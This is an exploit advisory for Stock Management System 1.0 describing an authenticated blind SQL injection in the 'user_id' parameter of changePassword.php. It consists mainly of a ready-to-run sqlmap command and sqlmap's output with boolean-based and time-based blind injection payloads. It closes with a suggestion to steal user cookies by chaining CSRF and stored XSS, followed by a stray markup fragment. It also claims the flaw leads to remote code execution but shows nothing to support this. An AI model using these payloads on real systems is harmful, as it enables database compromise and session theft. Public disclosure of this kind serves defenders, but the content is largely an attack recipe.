# Exploit Title: Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated) # Date: 11/06/2021 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # Version: 1.0 # Category: Webapps # Tested on: Apache2+MariaDB latest version # Description : Stock Management System suffers from SQL injection in '/stock/php_action/changePassword.php' because it does not sanitize the input before pushing into the sql query. Leading to remote code execution. - Vulnerable parameter: user_id= SQLmap command: -------------- sqlmap -u http:///stock/php_action/changePassword.php --data="password=invalidpassword&npassword=test&cpassword=test&user_id=1*" --cookie="PHPSESSID=" --is-dba SQLmap Output: ------------- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=(SELECT (CASE WHEN (7792=7792) THEN 1 ELSE (SELECT 5315 UNION SELECT 6564) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=1 AND (SELECT 8344 FROM (SELECT(SLEEP(5)))RdSH) Trick: ----- We could steal the users cookie by chaining CSRF and stored XSS
" />
and then use the cookie to preform SQL injection :)